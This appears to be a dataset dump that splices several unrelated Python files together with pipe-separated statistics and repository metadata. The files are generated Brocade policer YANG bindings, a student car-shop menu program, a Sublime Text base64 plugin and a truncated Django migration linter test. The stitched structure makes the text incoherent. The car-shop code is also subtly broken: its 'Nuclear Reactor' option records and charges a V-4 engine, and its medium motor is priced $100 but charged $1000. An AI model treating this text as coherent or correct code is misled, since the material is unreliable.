t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """exceed_set_tc must be of a type compatible with tc-value""",
'defined-type': "brocade-policer:tc-value",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)""",
})
self.__exceed_set_tc = t
if hasattr(self, '_set'):
self._set()
def _unset_exceed_set_tc(self):
self.__exceed_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
cir = __builtin__.property(_get_cir, _set_cir)
cbs = __builtin__.property(_get_cbs, _set_cbs)
eir = __builtin__.property(_get_eir, _set_eir)
ebs = __builtin__.property(_get_ebs, _set_ebs)
set_priority = __builtin__.property(_get_set_priority, _set_set_priority)
conform_set_dscp = __builtin__.property(_get_conform_set_dscp, _set_conform_set_dscp)
conform_set_prec = __builtin__.property(_get_conform_set_prec, _set_conform_set_prec)
conform_set_tc = __builtin__.property(_get_conform_set_tc, _set_conform_set_tc)
exceed_set_dscp = __builtin__.property(_get_exceed_set_dscp, _set_exceed_set_dscp)
exceed_set_prec = __builtin__.property(_get_exceed_set_prec, _set_exceed_set_prec)
exceed_set_tc = __builtin__.property(_get_exceed_set_tc, _set_exceed_set_tc)
_pyangbind_elements = {'cir': cir, 'cbs': cbs, 'eir': eir, 'ebs': ebs, 'set_priority': set_priority, 'conform_set_dscp': conform_set_dscp, 'conform_set_prec': conform_set_prec, 'conform_set_tc': conform_set_tc, 'exceed_set_dscp': exceed_set_dscp, 'exceed_set_prec': exceed_set_prec, 'exceed_set_tc': exceed_set_tc, }
| 90.871036 | 722 | 0.733493 | 6,009 | 42,982 | 5.010318 | 0.035114 | 0.033879 | 0.042781 | 0.045305 | 0.926961 | 0.910386 | 0.896403 | 0.889328 | 0.881622 | 0.87106 | 0 | 0.028686 | 0.112722 | 42,982 | 472 | 723 | 91.063559 | 0.760757 | 0.118422 | 0 | 0.493056 | 0 | 0.038194 | 0.420233 | 0.189696 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.027778 | 0 | 0.267361 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
581d7d97f1742c3c13581c06c9c474a82287314f | 43 | py | Python | data/__init__.py | SuhongMoon/BYOL-PyTorch | fa8eea6c4cc65436aa458a1a48c79fd0d9d46d51 | [
"MIT"
] | 73 | 2020-07-22T10:40:29.000Z | 2022-03-24T11:28:20.000Z | data/__init__.py | SuhongMoon/BYOL-PyTorch | fa8eea6c4cc65436aa458a1a48c79fd0d9d46d51 | [
"MIT"
] | 11 | 2020-07-26T00:40:09.000Z | 2022-03-23T09:42:46.000Z | data/__init__.py | SuhongMoon/BYOL-PyTorch | fa8eea6c4cc65436aa458a1a48c79fd0d9d46d51 | [
"MIT"
] | 14 | 2020-08-10T11:51:19.000Z | 2022-02-16T00:53:46.000Z | from .imagenet_loader import ImageNetLoader | 43 | 43 | 0.906977 | 5 | 43 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
58826549b21c96bd5e94f9b74bb33ff2bc6238e7 | 35,413 | py | Python | Final Project.py | ApeironDominus/Final-Project | 6c30c33e6994b79eb320a84645bc93bbbefc66c1 | [
"MIT"
] | null | null | null | Final Project.py | ApeironDominus/Final-Project | 6c30c33e6994b79eb320a84645bc93bbbefc66c1 | [
"MIT"
] | null | null | null | Final Project.py | ApeironDominus/Final-Project | 6c30c33e6994b79eb320a84645bc93bbbefc66c1 | [
"MIT"
] | null | null | null | #Custom Car Shop
#Daniel Causey
#CIS-120-102-FA18
#Define Variables
totalCost = 0
#Engine Variables
vTwinEngineCost = 200
v4EngineCost = 400
v6EngineCost = 1000
v8EngineCost = 1600
v12EngineCost = 2500
v16EngineCost = 10000
smallElectricMotor = 500
medElectricMotor = 1000
largeElectricMotor = 2000
nuclearReactor = 250000
#Chassis Variables
motorcycle = 1200
sedan = 2000
sports = 4000
sportsUtility = 6000
truck = 10000
luxury = 20000
militaryGrade = 40000
#Paintjob Variables
solid = 200
metallic = 500
pearlescent = 2000
matte = 3000
carbonFiber = 10000
#Interior Variables
fabric = 500
pLeather = 1000
standardLeather = 2500
luxuryLeather = 10000
#Menu Variables
userExit = False
userMenuChoice = 0
userSubMenuChoice = 0
userSubMenuExit = False
userPurchaseMenuChoice = 0
userPurchaseMenuExit = False
engineSelection = False
chassisSelection = False
paintStyleSelected = False
paintColorSelected = False
interiorSelected = False
#Color Array
colors = ["Red", "Orange", "Yellow", "Blue", "Purple", "Green", "Black", "White", "Grey"]
#Receipt Part 1
def printReceipt1():
file = open("receipt.txt", "w")
file.write("Thank you for your purchase!\n")
#Receipt Part 2
def printReceipt2():
file = open("receipt.txt", "a")
file.write("Total Cost: " + str(totalCost) + "\n")
file.write("*************************" + "\n")
file.write("Please come again!")
#Receipt Part 3
def printReceipt3():
import webbrowser
webbrowser.open("receipt.txt")
#View Cart Part 1
def viewCart1():
file = open("cart.txt", "w")
file.write ("These are the current contents of your cart,\n")
#View Cart Part 2
def viewCart2():
import webbrowser
webbrowser.open("cart.txt")
printReceipt1()
viewCart1()
#Menu
while (userExit == False):
print ("Welcome to Cecil's Custom Car Consortium!")
print ("What would you like to do?")
print ("1. Add an item to your car.")
print ("2. View your car.")
print ("3. Checkout and exit.")
userSubMenuExit = False
userMenuChoice = int(input())
if (userMenuChoice == 1):
while (userSubMenuExit == False):
print ("What type of part would you like to add to your car, remember you can only have one of each?")
print ("1. Engine Choices")
print ("2. Chassis Choices")
print ("3. Paintjob Options")
print ("4. Color Options")
print ("5. Interior Variables")
print ("6. Return to prior menu")
userPurchaseMenuExit = False
userSubMenuChoice = int(input())
if (userSubMenuChoice == 1):
while (userPurchaseMenuExit == False):
print ("What type of Engine would you like to use?")
print ("1. V-Twin Engine - $200")
print ("2. V-4 Engine - $400")
print ("3. V-6 Engine - $1000")
print ("4. V-8 Engine - $1600")
print ("5. V-12 Engine - $2500")
print ("6. V-16 Engine - $10000")
print ("7. Small Electric Motor - $500")
print ("8. Medium Electric Motor - $100")
print ("9. Large Electric Motor - $2000")
print ("10. Nuclear Reactor - $250000")
print ("11. Return to prior menu")
userPurchaseMenuChoice = int(input())
if (userPurchaseMenuChoice == 1):
if engineSelection == False:
totalCost = totalCost + vTwinEngineCost
file = open ("cart.txt", "a")
file.write ("Engine: V-Twin Engine " + "$200" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: V-Twin Engine " + "$200" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 2):
if engineSelection == False:
totalCost = totalCost + v4EngineCost
file = open ("cart.txt", "a")
file.write ("Engine: V-4 Engine " + "$400" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: V-4 Engine " + "$400" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 3):
if engineSelection == False:
totalCost = totalCost + v6EngineCost
file = open ("cart.txt", "a")
file.write ("Engine: V-6 Engine " + "$1000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: V-6 Engine " + "$1000" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 4):
if engineSelection == False:
totalCost = totalCost + v8EngineCost
file = open ("cart.txt", "a")
file.write ("Engine: V-8 Engine " + "$1600" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: V-8 Engine " + "$1600" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 5):
if engineSelection == False:
totalCost = totalCost + v12EngineCost
file = open ("cart.txt", "a")
file.write ("Engine: V-12 Engine " + "$2500" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: V-12 Engine " + "$2500" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 6):
if engineSelection == False:
totalCost = totalCost + v16EngineCost
file = open ("cart.txt", "a")
file.write ("Engine: V-16 Engine " + "$10000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: V-16 Engine " + "$10000" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 7):
if engineSelection == False:
totalCost = totalCost + smallElectricMotor
file = open ("cart.txt", "a")
file.write ("Engine: Small Electric Motor " + "$500" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: Small Electric Motor " + "$500" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 8):
if engineSelection == False:
totalCost = totalCost + medElectricMotor
file = open ("cart.txt", "a")
file.write ("Engine: Medium Electric Motor " + "$1000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: Medium Electric Motor " + "$1000" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 9):
if engineSelection == False:
totalCost = totalCost + largeElectricMotor
file = open ("cart.txt", "a")
file.write ("Engine: Large Electric Motor " + "$2000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: Large Electric Motor " + "$2000" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 10):
if engineSelection == False:
totalCost = totalCost + v4EngineCost
file = open ("cart.txt", "a")
file.write ("Engine: V-4 Engine " + "$400" + "\n")
file = open ("receipt.txt", "a")
file.write ("Engine: V-4 Engine " + "$400" + "\n")
engineSelection = True
break
elif engineSelection == True:
print ("You already have an engine and may not fit more than one in your car.")
userPurchaseMenuExit = True
elif (userPurchaseMenuChoice == 11):
userPurchaseMenuExit = True
break
else:
print("Please enter a valid number.")
elif (userSubMenuChoice == 2):
while (userPurchaseMenuExit == False):
print ("What type of Chassis would you like to use?")
print ("1. Motorcycle Chassis - $1200")
print ("2. Sedan Chassis - $2000")
print ("3. Sports Chassis - $4000")
print ("4. Sports Utility Chassis - $6000")
print ("5. Truck Chassis - $10000")
print ("6. Luxury Chassis - $20000")
print ("7. Military Grade Chassis - $40000")
print ("8. Return to prior menu")
userPurchaseMenuChoice = int(input())
if (userPurchaseMenuChoice == 1):
if chassisSelection == False:
totalCost = totalCost + motorcycle
file = open ("cart.txt", "a")
file.write ("Chassis: Motorcycle " + "$1200" + "\n")
file = open ("receipt.txt", "a")
file.write ("Chassis: Motorcycle " + "$1200" + "\n")
chassisSelection = True
break
elif chassisSelection == True:
print ("You already have a chassis and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 2):
if chassisSelection == False:
totalCost = totalCost + sedan
file = open ("cart.txt", "a")
file.write ("Chassis: Sedan " + "$2000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Chassis: Sedan " + "$2000" + "\n")
chassisSelection = True
break
elif chassisSelection == True:
print ("You already have a chassis and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 3):
if chassisSelection == False:
totalCost = totalCost + sports
file = open ("cart.txt", "a")
file.write ("Chassis: Sports " + "$4000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Chassis: Sports " + "$4000" + "\n")
chassisSelection = True
break
elif chassisSelection == True:
print ("You already have a chassis and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 4):
if chassisSelection == False:
totalCost = totalCost + sportsUtility
file = open ("cart.txt", "a")
file.write ("Chassis: Sports Utility " + "$6000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Chassis: Sports Utility " + "$6000" + "\n")
chassisSelection = True
break
elif chassisSelection == True:
print ("You already have a chassis and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 5):
if (chassisSelection == False):
totalCost = totalCost + truck
file = open ("cart.txt", "a")
file.write ("Chassis: Truck " + "$10000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Chassis: Truck " + "$10000" + "\n")
chassisSelection = True
break
elif (chassisSelection == True):
print ("You already have a chassis and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 6):
if (chassisSelection == False):
totalCost = totalCost + luxury
file = open ("cart.txt", "a")
file.write ("Chassis: Luxury " + "$20000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Chassis: Luxury " + "$20000" + "\n")
chassisSelection = True
break
elif (chassisSelection == True):
print ("You already have a chassis and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 7):
if (chassisSelection == False):
totalCost = totalCost + militaryGrade
file = open ("cart.txt", "a")
file.write ("Chassis: Military Grade " + "$40000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Chassis: Military Grade " + "$40000" + "\n")
chassisSelection = True
break
elif (chassisSelection == True):
print ("You already have a chassis and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 8):
userPurchaseMenuExit = True
break
else:
print("Please enter a valid number.")
elif (userSubMenuChoice == 3):
while (userPurchaseMenuExit == False):
print ("What type of Paintjob would you like to use?")
print ("1. Solid Paintjob - $200")
print ("2. Metallic Paintjob - $500")
print ("3. Pearlescent Paintjob - $2000")
print ("4. Matte Paintjob - $3000")
print ("5. Carbon Fiber Paintjob - $10000")
print ("6. Return to prior menu")
userPurchaseMenuChoice = int(input())
if (userPurchaseMenuChoice == 1):
if paintStyleSelected == False:
totalCost = totalCost + solid
file = open ("cart.txt", "a")
file.write ("Paintjob: Solid " + "$200" + "\n")
file = open ("receipt.txt", "a")
file.write ("Paintjob: Solid " + "$200" + "\n")
paintStyleSelected = True
break
elif paintStyleSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 2):
if paintStyleSelected == False:
totalCost = totalCost + metallic
file = open ("cart.txt", "a")
file.write ("Paintjob: Metallic " + "$500" + "\n")
file = open ("receipt.txt", "a")
file.write ("Paintjob: Metallic " + "$500" + "\n")
paintStyleSelected = True
break
elif paintStyleSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 3):
if paintStyleSelected == False:
totalCost = totalCost + pearlescent
file = open ("cart.txt", "a")
file.write ("Paintjob: Pearlescent " + "$2000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Paintjob: Pearlescent " + "$2000" + "\n")
paintStyleSelected = True
break
elif paintStyleSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 4):
if paintStyleSelected == False:
totalCost = totalCost + matte
file = open ("cart.txt", "a")
file.write ("Paintjob: Matte " + "$3000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Paintjob: Matte " + "$3000" + "\n")
paintStyleSelected = True
break
elif paintStyleSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 5):
if paintStyleSelected == False:
totalCost = totalCost + carbonFiber
file = open ("cart.txt", "a")
file.write ("Paintjob: Carbon Fiber " + "$10000" + "\n")
file = open ("receipt.txt", "a")
file.write ("Paintjob: Carbon Fiber " + "$10000" + "\n")
paintStyleSelected = True
break
elif paintStyleSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 6):
userPurchaseMenuExit = True
break
else:
print("Please enter a valid number.")
elif (userSubMenuChoice == 4):
while (userPurchaseMenuExit == False):
print ("What color paint would you like to use?")
print ("1. Red")
print ("2. Orange")
print ("3. Yellow")
print ("4. Blue")
print ("5. Purple")
print ("6. Green")
print ("7. Black")
print ("8. White")
print ("9. Grey")
print ("10. Return to prior menu")
userPurchaseMenuChoice = int(input())
if (userPurchaseMenuChoice == 1):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[0]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[0]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 2):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[1]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[1]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 3):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[2]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[2]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 4):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[3]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[3]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 5):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[4]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[4]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
if (userPurchaseMenuChoice == 6):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[5]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[5]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 7):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[6]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[6]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 8):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[7]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[7]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 9):
if paintColorSelected == False:
file = open ("cart.txt", "a")
file.write ("Paint Color: " + str(colors[8]) + "\n")
file = open ("receipt.txt", "a")
file.write ("Paint Color: " + str(colors[8]) + "\n")
paintColorSelected = True
break
elif paintColorSelected == True:
print ("You already have a paintjob and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 10):
userPurchaseMenuExit = True
break
else:
print("Please enter a valid number.")
elif (userSubMenuChoice == 5):
while (userPurchaseMenuExit == False):
print ("What type of Interior would you like to use?")
print ("1. Fabric Interior - $500")
print ("2. Pseudo-Leather Interior - $1000")
print ("3. Leather Interior - $2500")
print ("4. Luxury Leather Interior - $10000")
print ("5. Return to prior menu")
userPurchaseMenuChoice = int(input())
if (userPurchaseMenuChoice == 1):
if interiorSelected == False:
totalCost = totalCost + fabric
file = open ("receipt.txt", "a")
file.write ("Interior: Fabric " + "$500" + "\n")
file = open ("cart.txt", "a")
file.write ("Interior: Fabric " + "$500" + "\n")
interiorSelected = True
break
elif interiorSelected == True:
print ("You already have a interior and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 2):
if interiorSelected == False:
totalCost = totalCost + pLeather
file = open ("receipt.txt", "a")
file.write ("Interior: Pseudo-Leather " + "$1000" + "\n")
file = open ("cart.txt", "a")
file.write ("Interior: Pseudo-Leather " + "$1000" + "\n")
interiorSelected = True
break
elif interiorSelected == True:
print ("You already have a interior and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 3):
if interiorSelected == False:
totalCost = totalCost + standardLeather
file = open ("receipt.txt", "a")
file.write ("Interior: Leather " + "$2500" + "\n")
file = open ("cart.txt", "a")
file.write ("Interior: Leather " + "$2500" + "\n")
interiorSelected = True
break
elif interiorSelected == True:
print ("You already have a interior and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 4):
if interiorSelected == False:
totalCost = totalCost + luxuryLeather
file = open ("receipt.txt", "a")
file.write ("Interior: Luxury Leather " + "$10000" + "\n")
file = open ("cart.txt", "a")
file.write ("Interior: Luxury Leather " + "$10000" + "\n")
interiorSelected = True
break
elif interiorSelected == True:
print ("You already have a interior and may not fit more than one in your car.")
userPurchaseMenuExit = True
break
elif (userPurchaseMenuChoice == 5):
userPurchaseMenuExit = True
break
else:
print("Please enter a valid number.")
elif (userSubMenuChoice == 6):
break
else:
print("Please enter a valid number.")
elif (userMenuChoice == 2):
viewCart2()
elif (userMenuChoice == 3):
printReceipt2()
printReceipt3()
userExit = True
else:
print("Please enter a valid number.")
| 53.737481 | 115 | 0.409737 | 2,706 | 35,413 | 5.362158 | 0.072432 | 0.04652 | 0.039145 | 0.063611 | 0.803928 | 0.735217 | 0.733218 | 0.708753 | 0.665679 | 0.598828 | 0 | 0.03431 | 0.502894 | 35,413 | 658 | 116 | 53.819149 | 0.789934 | 0.006551 | 0 | 0.756058 | 0 | 0.001616 | 0.195526 | 0.000724 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008078 | false | 0 | 0.003231 | 0 | 0.011309 | 0.169628 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
588e7e269b235b3b854ca3fa3e72453aa9210bc5 | 792 | py | Python | base64_text.py | akashp1712/sublime_base64 | a6da3004689ac30a36f81afada3462600c1873a4 | [
"MIT"
] | 1 | 2018-01-22T09:12:30.000Z | 2018-01-22T09:12:30.000Z | base64_text.py | akashp1712/sublime_base64 | a6da3004689ac30a36f81afada3462600c1873a4 | [
"MIT"
] | null | null | null | base64_text.py | akashp1712/sublime_base64 | a6da3004689ac30a36f81afada3462600c1873a4 | [
"MIT"
] | null | null | null | import sublime
import sublime_plugin
import base64
class EncodeCommand(sublime_plugin.TextCommand):
def run(self, edit):
selection = self.view.sel()
for region in selection:
region_text = self.view.substr(region)
randomized_text = base64.b64encode(bytes(region_text.strip(), encoding='utf-8')).decode("utf-8")
self.view.replace(edit, region, str(randomized_text))
class DecodeCommand(sublime_plugin.TextCommand):
def run(self, edit):
selection = self.view.sel()
for region in selection:
region_text = self.view.substr(region)
randomized_text = base64.b64decode(bytes(region_text.strip(), encoding='utf-8')).decode("utf-8")
self.view.replace(edit, region, str(randomized_text))
| 37.714286 | 108 | 0.67298 | 97 | 792 | 5.381443 | 0.319588 | 0.091954 | 0.091954 | 0.103448 | 0.812261 | 0.812261 | 0.812261 | 0.812261 | 0.812261 | 0.812261 | 0 | 0.022329 | 0.208333 | 792 | 20 | 109 | 39.6 | 0.810207 | 0 | 0 | 0.588235 | 0 | 0 | 0.025253 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.176471 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5478effbcf6515e27686904db28c670d219a1895 | 11,464 | py | Python | tests/functional/test_data_migrations.py | passth/django-migration-linter | fa80e87962d0fde10732d1cec784b33bc6339b96 | [
"Apache-2.0"
] | null | null | null | tests/functional/test_data_migrations.py | passth/django-migration-linter | fa80e87962d0fde10732d1cec784b33bc6339b96 | [
"Apache-2.0"
] | null | null | null | tests/functional/test_data_migrations.py | passth/django-migration-linter | fa80e87962d0fde10732d1cec784b33bc6339b96 | [
"Apache-2.0"
] | null | null | null | import os
import unittest
from django.conf import settings
from django.db import migrations
from django_migration_linter import MigrationLinter
from tests import fixtures
class DataMigrationDetectionTestCase(unittest.TestCase):
def setUp(self, *args, **kwargs):
self.test_project_path = os.path.dirname(settings.BASE_DIR)
self.linter = MigrationLinter(
self.test_project_path,
include_apps=fixtures.DATA_MIGRATIONS,
)
def test_reverse_data_migration(self):
self.assertEqual(0, self.linter.nb_warnings)
reverse_migration = self.linter.migration_loader.disk_migrations[
("app_data_migrations", "0002_missing_reverse")
]
self.linter.lint_migration(reverse_migration)
self.assertEqual(1, self.linter.nb_warnings)
self.assertFalse(self.linter.has_errors)
def test_reverse_data_migration_ignore(self):
reverse_migration = self.linter.migration_loader.disk_migrations[
("app_data_migrations", "0003_incorrect_arguments")
]
self.linter.lint_migration(reverse_migration)
self.assertEqual(1, self.linter.nb_warnings)
self.assertFalse(self.linter.has_errors)
def test_exclude_warning_from_test(self):
self.linter = MigrationLinter(
self.test_project_path,
include_apps=fixtures.DATA_MIGRATIONS,
exclude_migration_tests=("RUNPYTHON_REVERSIBLE",),
)
reverse_migration = self.linter.migration_loader.disk_migrations[
("app_data_migrations", "0002_missing_reverse")
]
self.linter.lint_migration(reverse_migration)
self.assertEqual(0, self.linter.nb_warnings)
self.assertEqual(1, self.linter.nb_valid)
self.assertFalse(self.linter.has_errors)
def test_all_warnings_as_errors(self):
self.linter = MigrationLinter(
self.test_project_path,
include_apps=fixtures.DATA_MIGRATIONS,
all_warnings_as_errors=True,
)
reverse_migration = self.linter.migration_loader.disk_migrations[
("app_data_migrations", "0003_incorrect_arguments")
]
self.linter.lint_migration(reverse_migration)
self.assertEqual(0, self.linter.nb_warnings)
self.assertEqual(1, self.linter.nb_erroneous)
self.assertTrue(self.linter.has_errors)
def test_warnings_as_errors_tests_matches(self):
self.linter = MigrationLinter(
self.test_project_path,
include_apps=fixtures.DATA_MIGRATIONS,
warnings_as_errors_tests=["RUNPYTHON_ARGS_NAMING_CONVENTION"],
)
reverse_migration = self.linter.migration_loader.disk_migrations[
("app_data_migrations", "0003_incorrect_arguments")
]
self.linter.lint_migration(reverse_migration)
self.assertEqual(0, self.linter.nb_warnings)
self.assertEqual(1, self.linter.nb_erroneous)
self.assertTrue(self.linter.has_errors)
def test_warnings_as_errors_tests_no_match(self):
self.linter = MigrationLinter(
self.test_project_path,
include_apps=fixtures.DATA_MIGRATIONS,
warnings_as_errors_tests=[
